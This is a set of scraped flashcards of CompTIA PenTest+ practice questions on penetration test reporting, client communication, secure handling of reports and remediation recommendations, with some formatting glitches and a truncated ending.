Flashcards in “CompTIA PenTest+ Practice Test Chapter 5 Reporting and Communication (Sybex: Panek, Crystal, Tracy)”

Question 1

Q

You have just completed a penetration test for a client. During the test, you used a variety of different tools to collect data and conduct exploits. Now you need to aggregate all of the data generated by these tools into a format that is consistent, correlated, and readable. What is this process called?

A.Attestation of findings
B.Normalization of data
C.De-escalation
D.De-confliction

Answer

A

B.Normalization of data

Explanation:
When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and correlated. The goal is to make it such that the client can read the aggregated data and understand what happened during the test and when.

Question 2

Q

You have just completed a penetration test for a client and are now creating a written report of your findings. You need to make sure the reader understands that you followed the PCI DSS standard while conducting the test. In which part of the report should you include this information?

A.Findings
B.Remediation
C.Metrics and Measures
D.Methodology

Answer

A

D.Methodology

Explanation:
The final report you write for a penetration test should include a section entitled Methodology. In this section, you describe the penetration testing methodology you used to conduct the test. In this scenario, this would be the appropriate place to indicate that the PCI DSS standard was followed to conduct the test.

Question 3

Q

One of the goals of communication between the tester and the client during a penetration test is to ensure that both parties clearly understand the current security state of the network. Which of the following terms best describes this shared understanding?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization

Answer

A

A.Situational awareness

Explanation;
Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.

Question 4

Q

During a penetration test, the client organization’s network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. The administrator calls the penetration tester to verify that the attack is part of the penetration test and not coming from a real attacker. What is this process called?

A.Normalization of data
B.Situational awareness
C.De-confliction
D.Goal reprioritization

Answer

A

C.De-confliction

Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

Question 5

Q

During a penetration test, the client organization begins to receive complaints from customers indicating that the organization’s web server is very slow to respond or even crashes at times. The network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. Sales are being lost, so the administrator calls the penetration tester and asks them to stop the attack. What is this communication path called?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization

Answer

A

B.De-escalation

Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network.

Question 6

Q

Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to ensure everyone knows what the others are doing. What is this process called?

A.Situational awareness
B.Metrics and measures
C.De-confliction
D.Normalization of data

Answer

A

A.Situational awareness

Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.

Question 7

Q

Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to coordinate the timing of activities, including reconnaissance, enumeration, exploits, and so on. What is this process called?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Normalization of data

Answer

A

A.Situational awareness

Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.

Question 8

Q

During a penetration test, the client organization begins to receive complaints from remote workers indicating that the organization’s VPN is down. The network administrator discovers a local area network denial (LAND) attack underway that is aimed at the company’s VPN server at the edge of the network. The remote workers are unable to work, so the administrator calls the penetration tester and asks them to dial back the attack.
What is this communication path called?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization

Answer

A

B.De-escalation

Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits used during the penetration test because of the adverse effects they may be having on the network.

Question 9

Q

During a penetration test, the client organization’s network administrator discovers a teardrop attack underway that is aimed at the company’s perimeter router. The administrator calls the penetration tester to see whether the attack is part of the penetration test. What is this communication path called?

A.Situational awareness
B.Metrics and measures
C.De-confliction
D.Normalization of data

Answer

A

C.De-confliction

Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

Question 10

Q

Your organization is conducting a black box penetration test for a client. There are three testers on your team. At the beginning of the process, you have a team meeting to plan how the test will be conducted, when certain activities will occur, and which team members will be responsible for performing specific tasks. What is this process called?

A.De-confliction
B.De-escalation
C.Situational awareness
D.Goal reprioritization

Answer

A

C.Situational awareness

Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are planned and coordinated to occur at the appropriate time.

Question 11

Q

During a penetration test, an individual is caught trying to piggyback into the client organization’s facility. The trespasser claims to be a penetration tester and insists on being released.
Prior to pressing criminal charges, a member of the client’s IT staff calls the penetration tester to determine whether the trespasser is really a member of the penetration testing team. What is this communication path called?

A.Goal reprioritization
B.De-confliction
C.Situational awareness
D.De-escalation

Answer

A

B.De-confliction

Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is actually part of the authorized penetration test or whether it has been instigated by a third-party hacker.

Question 12

Q

During a penetration test, a tester gains physical access to the client’s facility using pretexting and is able to trigger a fail-open event for all of the organization’s electronic locking systems. As a result, all of the doors in the facility are unlocked. The client’s internal security team calls the penetration tester and asks them to stop the attack and immediately re-enable the door locks. What is this process called?

A.Situational awareness
B.Goal reprioritization
C.De-confliction
D.De-escalation

Answer

A

D.De-escalation

Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits or even stop them all together because of unsafe situations they may be causing.

Question 13

Q

Which of the following best describe a trusted agent during a penetration test?

A.A tester who secretly penetrates the target organization by applying for a job there
B.An individual within the target organization who has a direct line of communication with the penetration tester
C.An individual on the penetration testing team who has a direct line of communication with the IT staff of the target organization
D.A representative of the local law enforcement agency who has been briefed about the test by the penetration tester

Answer

A

B.An individual within the target organization who has a direct line of communication with the penetration tester

Explanation:
The term trusted agent refers to an individual within the target organization, typically an IT administrator or a manager, who has a direct line of communication with the penetration tester. This individual is usually responsible for de-confliction and de-escalation communications between the client and the tester.

Question 14

Q

You are conducting a black box penetration test for a client. The reconnaissance phase of the test is complete, and you are ready to move on to the next phase. Before doing so, you communicate with the client and inform them that test is moving from one
phase to another. Which type of communication trigger was used in this scenario?

A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise

Answer

A

A.Stages

Explanation:
A stages communication trigger happens when the penetration test progresses from one phase to another.

Question 15

Q

You are conducting a gray box penetration test for a client. During the test, you discover that many users’ Windows desktop systems haven’t been patched properly and are still vulnerable to several common types of ransomware. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their systems are vulnerable. Which type of communication trigger was used in this scenario?

A.Risk rating
B.Critical findings
C.Findings and remediation
D.Indicators of prior compromise

Answer

A

B.Critical findings

Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Question 16

Q

You are conducting a white box penetration test for a client. During the test, you discover a hidden backdoor administrator account on one of the client’s Active Directory domain controllers. You check the logs of the domain controller and find that the backdoor account is being actively used on a daily basis. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their server has been compromised. Which type of communication trigger was used in this scenario?

A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise

Answer

A

D.Indicators of prior compromise

Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Question 17

Q

You are conducting a black box penetration test for a client. The enumeration phase of the test is complete, and you are ready to begin exploiting vulnerable systems. Before doing so, you communicate with the client and inform them that test is transitioning. Which type of communication trigger was used in this scenario?

A.Risk rating
B.Critical findings
C.Findings and remediation
D.Stages

Answer

A

D.Stages

Explanation;
A stages communication trigger happens when the penetration test progresses from one phase to another.

Question 18

Q

You are conducting a white box penetration test for a client. During the test, you notice outgoing network traffic consistent with a distributed denial of service (DDoS) attack. You suspect that internal systems have been infected with malware, creating an amplifier network for the attack. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?

A.Stages
B.Indicators of prior compromise
C.Findings and remediation
D.Critical findings

Answer

A

B.Indicators of prior compromise

Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Question 19

Q

You are conducting a gray box penetration test for a client. During the test, you discover that help desk technicians are using authenticated but unencrypted FTP connections over the Internet to transfer files to computers located at remote branch-office sites. As such, their credentials are potentially being exposed on the public network. Even though this represents a tempting target for you to exploit, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that privileged credentials are potentially being exposed on the Internet. Which type of communication trigger was used in this scenario?

A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise

Answer

A

B.Critical findings

Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Question 20

Q

You are conducting a black box penetration test for a client. The test is now complete, and you are ready to begin cleaning up after yourself. Before doing so, you communicate with the client and inform them that the test is complete and to be aware that cleanup activates will be occurring. Which type of communication trigger was used in this scenario?

A.Risk rating
B.Critical findings
C.Stages
D.Indicators of prior compromise

Answer

A

C.Stages

Explanation:
A stages communication trigger happens when the penetration test progresses from one phase to another.

Question 21

Q

You are conducting a black box penetration test for a small financial institution. Using pretexting, you are able to gain access to the target facility by posing as a copier repair person. As you walk through the building, you notice that almost all employees have written their (overly complex) passwords on sticky notes and posted them on their computer monitors and keyboards. Some are so obvious that they can be seen by keen-eyed customers. This represents a tempting target for you to exploit; however, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that credentials are plainly visible. Which type of communication trigger was used in this scenario?

A.Indicators of prior compromise
B.Critical findings
C.Communication path
D.Stages

Answer

A

B.Critical findings

Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Question 22

Q

You are conducting a white box penetration test for a client. During the test, you notice that all end-user workstations are configured with only the default Windows antivirus scanner. You further notice that many end users use an application to complete their daily work that is a known Trojan horse commonly used to create a botnet. Instead of waiting until the end of the test, you immediately communicate with the client to warn them.
Which type of communication trigger was used in this scenario?

A. Indicators of prior compromise
B.Critical findings
C.Communication path
D.Stages

Answer

A

A. Indicators of prior compromise

Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Question 23

Q

You are conducting a PCI DSS penetration test for a client. During the testing process, a dangerous ransomware exploit begins to spread between networks around the world. The client asks you to halt the PCI DSS penetration test and instead test to see whether their network is vulnerable to this new type of malware. Which term best describes what happened in this scenario?

A.Situational awareness
B.Goal reprioritization
C.Indicators of prior compromise
D.Attestation of findings

Answer

A

B.Goal reprioritization

Explanation:
Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, the PCI DSS test is being modified to include testing for vulnerability for the new type of ransomware.

Question 24

Q

You are conducting a gray box penetration test for a client. During the testing process, you notice that their wireless network uses weak encryption with a preshared key (00000001) that is easy to brute-force crack. Further, you notice that client has implemented omnidirectional access points throughout the facility. You suspect that the wireless signal is emanating far outside the building. You contact the client and recommend that the test be modified to include testing of the Wi-Fi network from a black box perspective. Which term best describes what happened in this scenario?

A.Goal reprioritization
B.Attestation of findings
C.Indicators of prior compromise
D.Situational awareness

Answer

A

A.Goal reprioritization

Explanation:
Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, a black box component has been added to a traditional gray box test.

Question 25

Q

Which of the following terms refers to the process of gathering data produced by the various tools in a penetration test and formatting the data in a consistent manner such that it can be easily read?

A.Attestation of findings
B.Normalization of data
C.Remediation
D.Disposition of reports

Answer

A

B.Normalization of data

Explanation:
When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and easy to understand.

Question 26

Q

You are generating a written report of findings after a penetration test. During the test, you followed the NIST 800-115 standard. In which section of the report should you include this information?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures

Answer

A

B.Methodology

Explanation:
When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the NIST 800-115 methodology.

Question 27

Q

You are generating a written report of findings after a penetration test. In which section of the report should you provide the reader with a high-level synopsis of the test and the results?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures

Answer

A

A.Executive summary

Explanation:
When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

Question 28

Q

You are generating a written report of findings after a penetration test. In which section should you report risk ratings?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures Conclusion

Answer

A

D.Metrics and measures Conclusion

Explanation:
When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

Question 29

Q

Which section of a written report of penetration test findings is intended to be read by less-technical audiences?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures 
E.Conclusion

Answer

A

A.Executive summary

Explanation:
When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

Question 30

Q

THIS IS A DUMB FUCKING QUESTION

You are generating a written report of findings after a penetration test. During the test, you followed the specifications of the EC-Council for its Certified Ethical Hacker (CEH) certification. Where should this information be included in your report?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures 
E.Conclusion

Answer

A

B.Methodology

Explanation:
When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the EC-Council’s CEH methodology.

Question 31

Q

You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven’t been patched properly and are susceptible to the WannaCry ransomware. Where should you include this information in your report?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures 
E.Conclusion

Answer

A

C.Findings and remediation

Explanation:
When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them.

Question 32

Q

You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven’t been patched properly and are susceptible to the WannaCry ransomware. To fix this, the client needs to install the MS17-010 – Critical update from Microsoft. Where should you include this recommendation in your report?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures 
E.Conclusion

Answer

A

C.Findings and remediation

Explanation:
When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them and what the client can do to fix the problem. In this example, you should recommend they install the MS17-010 – Critical update from Microsoft in this section.

Question 33

Q

You are generating a written report of findings after a penetration test. You cross-reference each vulnerability you found in the test against the Common Vulnerabilities and Exposures (CVE) database to assign it a qualitative risk rating of Low, Medium, High, or Critical. Where should these risk ratings be included in the report?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures 
E.Conclusion

Answer

A

D.Metrics and measures

Explanation:
When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

Question 34

Q

You are generating a written report of findings after a penetration test. Based on the results of the test, you have created a list of recommendations you feel the client should focus on. Where should you include your recommendations in the report?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures 
E.Conclusion

Answer

A

E.Conclusion

Explanation:
When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section.

Question 35

Q

You are generating a written report of findings after a penetration test. In which section of the report should you consider the risk appetite of the client when deciding which information to include?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures 
E.Conclusion

Answer

A

C.Findings and remediation

Explanation:
The information you include in the Findings and Remediation section of your written report of findings will usually be constrained by the client’s risk appetite. For example, an organization with a higher-risk appetite may want you to only include information about high-risk or critical-risk vulnerabilities you discovered and not report medium or low-risk vulnerabilities.

Question 36

Q

You are generating a written report of findings after a penetration test. Based on the sheer number of vulnerabilities you discovered in the test, you feel that the client should undergo a follow-up penetration test within the next three months to verify that the issues have been remediated. Where should you include this recommendation in the report?

A.Executive summary 
B.Methodology 
C.Findings and remediation 
D.Metrics and measures
E.Conclusion

Answer

A

E.Conclusion

Explanation:
When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section, including when you think the client should conduct follow-up penetration tests.

Question 37

Q

You have just finished writing a report of findings for a client after a penetration test. How long is your organization required to store the document after the test is complete?

A.Six months
B.One year
C.Five years
D.Depends on the client contract

Answer

A

D.Depends on the client contract

Explanation:
Typically, there is no legally mandated storage time for reports after a penetration test is complete. The amount of time you are required to store the client’s report will usually be governed by your contract with the client.

Question 38

Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Print a hard copy and keep it in a file folder on your desk.
B.Save it to a flash drive that is stored in a pen holder on your desk.
C.Burn it to a rewritable optical disc and store it in desk drawer.
D.Save it to an encrypted file on a file server.

Answer

A

D.Save it to an encrypted file on a file server.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing the report in an encrypted file on a file server would make it more difficult for the file to be stolen than the other options listed.

Question 39

Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.
B.Save it to your Google drive account.
C.Save it in a file on your laptop.
D.Burn it to a rewritable optical disc and store it in a CD caddy on your desk.

Answer

A

A.Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing a hard copy of the report in a locked filing cabinet that has been bolted to the floor would make it more difficult for the report to be stolen than the other options listed.

Question 40

Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Burn the report to an optical disk and store it in a locked safe bolted to your desk.
B.Save the file to an encrypted flash drive.
C.Copy the file to your phone.
D.Save the report to a file on your workstation’s desktop.

Answer

A

A.Burn the report to an optical disk and store it in a locked safe bolted to your desk.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, burning the file to an optical disc and storing it in a secured safe would make it more difficult for the report to be stolen than the other options listed.

Question 41

Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Burn the report to an optical disk and keep it in a hanging file folder in your desk.
B.Save the file to an encrypted flash drive and store it in a locket cabinet.
C.Copy the file to your phone.
D.Save the report to your organization’s FTP server.

Answer

A

B.Save the file to an encrypted flash drive and store it in a locket cabinet.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, saving the file to an encrypted flash drive and storing it in a secured cabinet would make it more difficult for the report to be stolen than the other options listed.

Question 42

Q

You need to dispose of several penetration test reports from old clients. The files are stored on a removable hard drive that is stored in a locked safe. Which of the following is the best way to do this?

A.Delete the files from the drive.
B.Use the fdisk utility to repartition the drive.
C.Use disk wiping software on the drive.
D.Reformat the drive.

Answer

A

C.Use disk wiping software on the drive.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, wiping the drive will make it much harder to recover the files from the drive.

Question 43

Q

You need to dispose of several penetration test reports from old clients. Hard copies of the reports are stored in a locked filing cabinet that has been bolted to the floor. Which of the following is the best way to do this?

A.Put the reports in the garbage.
B.Put the reports in the recycle bin.
C.Stack the reports upside down by your team’s printer for use as “scratch paper.”
D.Shred the report in a cross-cut shredder.

Answer

A

D.Shred the report in a cross-cut shredder.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, shredding the
documents will make it much harder to recover the data from the reports.

Question 44

Q

You need to dispose of several penetration test reports from old clients. The files are stored on flash drives that are stored in a locked cabinet. Which of the following is the best way to do this?

A.Smash the drives with a hammer.
B.Delete the files from the drives.
C.Use the Disk Management utility to repartition the drives.
D.Reformat the drives using File Explorer in Windows.

Answer

A

A.Smash the drives with a hammer.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying inexpensive flash drives will make it much harder to recover the data from the reports.

Question 45

Q

You need to dispose of several penetration test reports from old clients. The files are stored on rewritable optical discs that are stored in a locked cabinet. Which of the following is the best way to do this?

A.Delete the files from the discs.
B.Shred the discs.
C.Delete the files and then save new files to the discs.
D.Reformat the discs.

Answer

A

B.Shred the discs.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying optical discs will make it much harder to recover the data from the reports.

Question 46

Q

You have just concluded a penetration test for a client that makes extensive use of work-at-home employees. The employees use a VPN connection. During the test, you were able to use social engineering to compromise an employee’s VPN connection and gain access to the internal network. As a mitigation strategy, you recommend that the client implement multifactor authentication for all VPN connections. What type of solution is this?

A.Technological
B.People
C.Process
D.Tactical

Answer

A

A.Technological

Explanation:
Implementing multifactor authentication for VPN connections is an example of a technological mitigation strategy.

Question 47

Q

You have just concluded a penetration test for a client. During the test, you were able to use social engineering techniques to gain access to the server room inside the client’s facility. To address this vulnerability, you recommend that the client require security awareness training for all employees every six months. What type of solution is this?

A.Technological
B.People
C.Process
D.Tactical

Answer

A

B.People

Explanation:
Implementing regular security awareness training for all employees is an example of a people-based mitigation strategy.

Question 48

Q

You have just concluded a penetration test for a client. During the test, you were able to use stale user accounts associated with former employees to gain access to a sensitive file server. To address this vulnerability, you recommend that the client remove
user accounts whenever an employee leaves the organization. What type of solution is this?

A.Technological
B.People
C.Process
D.Strategic

Answer

A

C.Process

Explanation:
Implementing off-boarding processes for employees when they leave the organization is an example of a process-based mitigation strategy.

Question 49

Q

You have just concluded a penetration test for a client. During the test, you discovered that system administrators were using unencrypted Telnet sessions to remotely manage sensitive servers. You were able to sniff network traffic and capture administrative credentials from these connections. To address this vulnerability, you recommend that the client require all IT staff to pass a network security certification exam. What type of solution is this?

A.Technological
B.People
C.Process
D.Strategic

Answer

A

B.People

Explanation:
Requiring IT staff members to pass a network security certification exam is an example of a people-based mitigation strategy.

Question 50

Q

You have just concluded a penetration test for a client. During the test, you were able to use John the Ripper to brute force an administrative password on a sensitive Windows file server. To address this vulnerability, you recommend that the client implement Group Policy settings that require complex passwords as well as lock the system after three incorrect logon attempts. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

Answer

A

A.Technological

Explanation:
Requiring complex passwords and implementing account restrictions are examples of technological mitigation strategies.

Question 51

Q

You have just concluded a penetration test for a client. The client has more than 2,000 employees, but only two of them are network administrators. During the test, you were able to quickly overwhelm them with the sheer volume of your attacks. To address this vulnerability, you recommend that the client hire additional network administrators who have cybersecurity credentials and experience. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

Answer

A

B.People

Explanation:
Hiring additional IT staff members who have experience with cyber security is an example of a people-based mitigation strategy.

Question 52

Q

You have just concluded a penetration test for a client. During the test, you discovered that the organization’s employees made extensive use of a shared Google Drive account to collaborate. You were able to use a social engineering exploit to get access to the shared account and access sensitive files. To address this vulnerability, you recommend that the client disallow this practice among employees. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

Answer

A

C.Process

Explanation:
Forbidding employees from using external cloud-based services such as Google Drive is an example of a process-based mitigation strategy.

Question 53

Q

You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s physical facility by tailgating with a group of employees. To address this vulnerability, you recommend that the client implement a man-trap locking door at the entrance to the facility. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

Answer

A

A.Technological

Explanation:
Implementing a mantrap at the main entrance is an example of a technological mitigation strategy.

Question 54

Q

You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s wireless network using Aircrack-ng while sitting in your car in a parking lot across the street. To address this vulnerability, you recommend that the client implement directional wireless network antennas and also manipulate the power level of the access points to prevent signal emanation. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

Answer

A

A.Technological

Explanation:
Implementing directional wireless antennas and manipulating access point power levels to prevent signal emanation are examples of technological mitigation strategies.

Question 55

Q

You have just concluded a penetration test for a client. During the test, you were able to use social engineering to convince the organization’s accounts payable clerk to send a large ACH payment to a fictitious bank account. To address this vulnerability, you recommend that the client implement division of duties such that two individuals must sign off on all payouts. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

Answer

A

C.Process

Explanation:
Requiring multiple sign-offs on payouts is an example of a process-based mitigation strategy.

Question 56

Q

You have just concluded a penetration test for a client. During the test, you were able to use a phishing exploit to collect authentication credentials from several employees. To address this vulnerability, you recommend that the client conduct a mandatory security awareness training session for all employees. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

Answer

A

B.People

Explanation:
Conducting security awareness training with employees is an example of a people-based mitigation strategy.

Question 57

Q

You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. What could you recommend to remediate this problem?

A.Encrypt the passwords.
B.Implement password complexity requirements.
C.Implement intruder lockout.
D.Randomize the local Administrator credentials.

Answer

A

D.Randomize the local Administrator credentials.

Explanation:
Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to simply randomize those credentials. Otherwise, compromising the local administrator password on one desktop would expose all the other desktops in the organization.`

Question 58

Q

You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. When you report this to the client, they indicate that are aware of this and that they did this deliberately to reduce management complexity. What solution could you recommend that would remediate the vulnerability without increasing management complexity?

A.Randomize the local Administrator credentials. B.Implement LAPS.
C.Make all local Windows users members of the local Administrators group.
D.Make all Windows domain users members of the Domain Administrators group.

Answer

A

B.Implement LAPS.

Explanation:
Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to implement the Local Administrator Password Solution (LAPS) from Microsoft. This solution periodically randomizes local administrator passwords and saves those secrets in Active Directory.

Question 59

Q

You have just concluded a penetration test for a client. In your findings, you report that you were able to compromise several users’ Windows accounts because they used passwords such as password, aaa, and 1234. Which of the following domain Group Policy settings could you recommend they implement to prevent weak password complexity? (Choose two.)

A.Store passwords using reversible encryption.
B.Password must meet complexity requirements.
C.Minimum password length.
D.Certificate path validation settings.
E.Certificate services client – Auto-enrollment.

Answer

A

B.Password must meet complexity requirements. C.Minimum password length.

Explanation:
The “Password must meet complexity requirements” and the “Minimum password length” Group Policy settings can be used to enforce a degree of password complexity. By default, the “Password must meet complexity requirements” policy requires passwords be at least six characters long and contain characters from three of the following four categories: uppercase letters, lowercase letters, numbers, and special characters. The minimum password length defines the least number of characters that a password may contain.

Question 60

Q

Which of the following Windows Group Policy settings can be used to prevent a user from reusing the same password over and over?

A.Enforce password history
B.Store passwords using reversible encryption C.Minimum password length
D.Password must meet complexity requirements

Answer

A

A.Enforce password history

Explanation:
The “Enforce password history” Group Policy setting determines the number of unique new passwords that a user must use before an old password can be reused again. Configuring this policy helps enhance security by preventing users from reusing old passwords.

Question 61

Q

Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one?

A.Enforce password history
B.Minimum password length
C.Minimum password age
D.Maximum password age

Answer

A

D.Maximum password age

Explanation:
The “Maximum password age” Group Policy setting determines how long a user can keep the same password before being required to change it to a new one. Once that time period has elapsed, the user is forced to create a new password.

Question 62

Q

Which of the following Windows Group Policy settings determines how long a user must keep the same password before being allowed to change it to a new one?

A.Enforce password history
B.Minimum password length
C.Minimum password age
D.Maximum password age

Answer

A

C.Minimum password age

Explanation:
The “Minimum password age” Group Policy setting determines how long a user must keep the same password before being allowed to change it to a new one. Until that time period has elapsed, the user is forced to keep the same password. This prevents users from making constant changes to their password in an attempt to circumvent the “Enforce password history policy” setting.

Question 63

Q

You have just concluded a penetration test for a client. In your findings, you report that users are allowed to keep the same password indefinitely, which increases the likelihood that they will be compromised at some point. Given that the client users Linux desktops and servers, which of the following Linux commands should you recommend they use to fix this issue?

A.chage
B.chmod
C.chgroup
D.chown

Answer

A

A.chage

Explanation:
The chage command can be used on Linux systems to configure password aging for user accounts.

Question 64

Q

You have just concluded a penetration test for a client. In your findings, you report that brute-force password attacks against Windows domain user accounts were successful because nothing stopped the password-cracking software from trying password after password for a given user. Which of the following Windows domain Group Policy settings could you recommend the client implement to remediate this issue?

A.Enforce password history
B.Password must meet complexity requirements
C.Store passwords using reversible encryption D.Account lockout threshold

Answer

A

D.Account lockout threshold

Explanation:
The “Account lockout threshold” Group Policy setting determines the number of failed logon attempts a user is allowed to make before the account is locked. A locked account can’t be used again until it is unlocked by an administrator or the lockout period for the account has elapsed. This policy setting can help prevent brute-force attacks by locking an account after only a few guessing attempts.

Answer 65

A

B.Account lockout duration

Explanation:
The “Account lockout duration” Group Policy setting determines how long a locked account remains locked before being automatically unlocked. This policy setting helps prevent brute-force attacks by severely increasing the amount of time required to conduct the attack.

Answer 66

A

C.Reset account lockout counter after

Explanation:
The “Reset account lockout counter after” Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0. This policy setting helps prevent brute-force attacks by significantly increasing the amount of time required to conduct the attack.

Answer 67

A

A.chage

Explanation:
